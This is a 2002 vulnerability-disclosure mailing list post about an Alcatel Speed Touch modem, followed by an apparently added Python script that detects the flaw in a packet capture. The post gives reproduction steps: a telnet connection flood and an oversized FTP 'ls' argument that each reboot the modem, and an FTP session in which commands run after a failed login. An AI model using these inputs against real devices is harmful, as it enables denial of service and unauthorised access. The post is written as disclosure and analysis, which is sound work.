Vulnerability Development mailing list archives
Alcatel Speed Touch Modem problems.. or not? Anyone?
From: Strumpf Noir Society <vuln-dev () labs secureance com>
Date: Thu, 21 Feb 2002 15:09:21 +0100
Hi cats n' kittens,
I came across below, but Alcatel is unable to reproduce it they say.
I was wondering whether anyone out there could do a quick test and supply
me with some results to wave at them (if there indeed is an issue)? Below
was tested with a Speed Touch Home modem, which would make these
problems LAN/internal ones, but it is my understanding that the Speed
Touch Pro has an external ip as well, which could extend the possibilities
a bit :) Anyways, any feedback would be appreciated, on to the problem:
1) My Alcatel Speed Touch Home (GV8BAA3.253 - 997001) ADSL modem seems
unable to handle a large number of connections to its telnet daemon. About
10-20 quick concurrent connections will cause the modem to reboot.
2) The size of arguments passed through ftp commands to the ftp server
seems to be unchecked. This also allows someone to crash/reboot the modem:
$ ftp 10.0.0.138
Connected to 10.0.0.138.
220 Inactivity timer = 120 seconds. Use 'site idle <secs>' to change.
User (10.0.0.138:(none)): guest
331 SpeedTouch (xx-xx-xx-xx-xx-xx) User guest OK. Password required.
Password:
530 Invalid password
Login failed
ls aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Interesting part here is that even though the login fails, it appears
possible to pass the command to the server. It seems there is a problem
with the ftp daemon's authentication scheme, below test would appear to
support that as well:
3) I have a sniffer running on the wire, listening for all traffic to and
from the box's internal ip 10.0.0.150. The modem has ip 10.0.0.138.
I log in with user/pass guest/guest, which are invalid for the modem.
$ ftp 10.0.0.138
Connected to 10.0.0.138.
220 Inactivity timer = 120 seconds. Use 'site idle <secs>' to change.
User (10.0.0.138:(none)): guest
331 SpeedTouch (xx-xx-xx-xx-xx-xx) User guest OK. Password required.
Password:
530 Invalid password
Login failed
ls
200 Connected to 10.0.0.150 port 2681
530 Unknown user
So far so good, I'm not allowed the listing, since I'm not properly logged
in. However, the packetlog (NGSSniff) reveals the following:
IP Header
Length and version: 0x45
Type of service: 0x00
Total length: 74
Identifier: 27510
Flags: 0x0000
TTL: 64
Protocol: 6 (TCP)
Checksum: 0xfa18
Source IP: 10.0.0.138
Dest IP: 10.0.0.150
TCP Header
Source port: 21
Dest port: 2675
Sequence: 3435584144
ack: 1451021190
Header length: 0x80
Flags: 0x18 (ACK PSH )
Window Size: 4096
Checksum: 0xb3ac
Urgent Pointer: 0
Raw Data
35 33 30 20 49 6e 76 61 6c 69 64 20 70 61 73 73 (530 Invalid pass)
77 6f 72 64 0d 0a (word )
IP Header
Length and version: 0x45
Type of service: 0x00
Total length: 76
Identifier: 58979
Flags: 0x0000
TTL: 64
Protocol: 6 (TCP)
Checksum: 0x7f29
Source IP: 10.0.0.150
Dest IP: 10.0.0.138
TCP Header
Source port: 2675
Dest port: 21
Sequence: 1451021190
ack: 3435584166
Header length: 0x80
Flags: 0x18 (ACK PSH )
Window Size: 64076
Checksum: 0x493d
Urgent Pointer: 0
Raw Data
50 4f 52 54 20 31 30 2c 30 2c 30 2c 31 35 30 2c (PORT 10,0,0,150,)
31 30 2c 31 31 36 0d 0a (10,116 )
IP Header
Length and version: 0x45
Type of service: 0x00
Total length: 91
Identifier: 27520
Flags: 0x0000
TTL: 64
Protocol: 6 (TCP)
Checksum: 0xf9fd
Source IP: 10.0.0.138
Dest IP: 10.0.0.150
TCP Header
Source port: 21
Dest port: 2675
Sequence: 3435584166
ack: 1451021214
Header length: 0x80
Flags: 0x18 (ACK PSH )
Window Size: 4096
Checksum: 0x31c4
Urgent Pointer: 0
Raw Data
32 30 30 20 43 6f 6e 6e 65 63 74 65 64 20 74 6f (200 Connected to)
20 31 30 2e 30 2e 30 2e 31 35 30 20 70 6f 72 74 ( 10.0.0.150 port)
20 32 36 37 36 0d 0a ( 2676 )
IP Header
Length and version: 0x45
Type of service: 0x00
Total length: 58
Identifier: 58992
Flags: 0x0000
TTL: 64
Protocol: 6 (TCP)
Checksum: 0x7f2e
Source IP: 10.0.0.150
Dest IP: 10.0.0.138
TCP Header
Source port: 2675
Dest port: 21
Sequence: 1451021214
ack: 3435584205
Header length: 0x80
Flags: 0x18 (ACK PSH )
Window Size: 64037
Checksum: 0xeac1
Urgent Pointer: 0
Raw Data
4e 4c 53 54 0d 0a (NLST )
IP Header
Length and version: 0x45
Type of service: 0x00
Total length: 70
Identifier: 27522
Flags: 0x0000
TTL: 64
Protocol: 6 (TCP)
Checksum: 0xfa10
Source IP: 10.0.0.138
Dest IP: 10.0.0.150
TCP Header
Source port: 21
Dest port: 2675
Sequence: 3435584205
ack: 1451021220
Header length: 0x80
Flags: 0x18 (ACK PSH )
Window Size: 4096
Checksum: 0x97b8
Urgent Pointer: 0
Raw Data
35 33 30 20 55 6e 6b 6e 6f 77 6e 20 75 73 65 72 (530 Unknown user)
0d 0a ( )
IP Header
Length and version: 0x45
Type of service: 0x00
Total length: 61
Identifier: 27523
Flags: 0x0000
TTL: 64
Protocol: 6 (TCP)
Checksum: 0xfa18
Source IP: 10.0.0.138
Dest IP: 10.0.0.150
TCP Header
Source port: 20
Dest port: 2676
Sequence: 3436864002
ack: 1453411572
Header length: 0x80
Flags: 0x18 (ACK PSH )
Window Size: 4096
Checksum: 0x12c8
Urgent Pointer: 0
Raw Data
74 6f 74 61 6c 20 31 0d 0a (total 1 )
IP Header
Length and version: 0x45
Type of service: 0x00
Total length: 101
Identifier: 27524
Flags: 0x0000
TTL: 64
Protocol: 6 (TCP)
Checksum: 0xf9ef
Source IP: 10.0.0.138
Dest IP: 10.0.0.150
TCP Header
Source port: 20
Dest port: 2676
Sequence: 3436864011
ack: 1453411572
Header length: 0x80
Flags: 0x19 (ACK PSH FIN )
Window Size: 4096
Checksum: 0xdff8
Urgent Pointer: 0
Raw Data
61 63 74 69 76 65 0d 0a 64 6c 0d 0a 73 74 61 72 (active dl star)
74 75 70 2e 63 6d 64 0d 0a 47 56 38 41 41 41 31 (tup.cmd GV8AAA1)
2e 30 30 30 0d 0a 6d 6f 75 6e 74 2e 63 6d 64 0d (.000 mount.cmd )
0a ( )
IP Header
Length and version: 0x45
Type of service: 0x00
Total length: 132
Identifier: 27525
Flags: 0x0000
TTL: 64
Protocol: 6 (TCP)
Checksum: 0xf9cf
Source IP: 10.0.0.138
Dest IP: 10.0.0.150
TCP Header
Source port: 21
Dest port: 2675
Sequence: 3435584205
ack: 1451021220
Header length: 0x80
Flags: 0x18 (ACK PSH )
Window Size: 4096
Checksum: 0xe525
Urgent Pointer: 0
Raw Data
35 33 30 20 55 6e 6b 6e 6f 77 6e 20 75 73 65 72 (530 Unknown user)
0d 0a 31 35 30 20 4f 70 65 6e 69 6e 67 20 64 61 ( 150 Opening da)
74 61 20 63 6f 6e 6e 65 63 74 69 6f 6e 20 66 6f (ta connection fo)
72 20 2f 62 69 6e 2f 6c 73 0d 0a 32 32 36 20 30 (r /bin/ls 226 0)
20 6d 61 74 63 68 65 73 20 74 6f 74 61 6c 0d 0a ( matches total )
It seems the 'ls' is still executed anyways and that the ftp client (Win2k
ftp.exe) is just withholding the information from me in some way. Above IS
effectively a listing of my modem's ftp "root".
Any thoughts/comments/similar (or different) results? Much obliged :)
Cheers,
Thejian
--
Best regards,
Strumpf Noir Society mailto:vuln-dev () labs secureance com
"Mere accumulation of observational evidence is not proof."
-- Death, "The Hogfather"
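As an added example (not part of the post, and not Alcatel's or NGSSniff's code), the following Python script reassembles the server side of the FTP control channel from "Raw Data" lines in the dump layout shown above and flags RFC 959 transfer replies (150/226) that the daemon sent while no login had succeeded, which is exactly the behaviour the packet log reveals. The sample lines are the port-21 bytes copied from the post; the reply-code state machine is an assumption about how a correctly behaving server should answer.

```python
# Constructed sample: the server-to-client (port 21) "Raw Data" lines copied
# from the NGSSniff dump in the post, in its "hex bytes (ascii)" layout.
SERVER_RAW = """\
35 33 30 20 49 6e 76 61 6c 69 64 20 70 61 73 73 (530 Invalid pass)
77 6f 72 64 0d 0a (word )
32 30 30 20 43 6f 6e 6e 65 63 74 65 64 20 74 6f (200 Connected to)
20 31 30 2e 30 2e 30 2e 31 35 30 20 70 6f 72 74 ( 10.0.0.150 port)
20 32 36 37 36 0d 0a ( 2676 )
35 33 30 20 55 6e 6b 6e 6f 77 6e 20 75 73 65 72 (530 Unknown user)
0d 0a 31 35 30 20 4f 70 65 6e 69 6e 67 20 64 61 ( 150 Opening da)
74 61 20 63 6f 6e 6e 65 63 74 69 6f 6e 20 66 6f (ta connection fo)
72 20 2f 62 69 6e 2f 6c 73 0d 0a 32 32 36 20 30 (r /bin/ls 226 0)
20 6d 61 74 63 68 65 73 20 74 6f 74 61 6c 0d 0a ( matches total )
"""

# RFC 959 reply codes a server only sends after executing a transfer command;
# a daemon with working access control answers 530 to those before login.
TRANSFER_CODES = {"125", "150", "226", "250"}

def dump_to_bytes(dump):
    """Join the hex column of each dump line, dropping the '(ascii)' column."""
    return b"".join(bytes.fromhex(l.split("(", 1)[0]) for l in dump.splitlines())

def parse_replies(dump):
    """Split the reassembled control-channel stream into (code, text) replies."""
    replies = []
    for line in dump_to_bytes(dump).decode("ascii").split("\r\n"):
        if len(line) >= 4 and line[:3].isdigit() and line[3] in " -":
            replies.append((line[:3], line[4:]))
    return replies

def check_auth_bypass(replies):
    """Return transfer replies sent while no login (230) had succeeded."""
    authenticated, findings = False, []
    for code, text in replies:
        if code == "230":            # login successful
            authenticated = True
        elif code == "530":          # login failed / not logged in
            authenticated = False
        elif code in TRANSFER_CODES and not authenticated:
            findings.append((code, text))
    return findings

if __name__ == "__main__":
    for code, text in check_auth_bypass(parse_replies(SERVER_RAW)):
        print(f"command executed without login: {code} {text}")
```

Run against the captured bytes it reports the 150 and 226 replies that followed "530 Unknown user", i.e. the NLST was executed and the listing sent on the data channel despite the failed login.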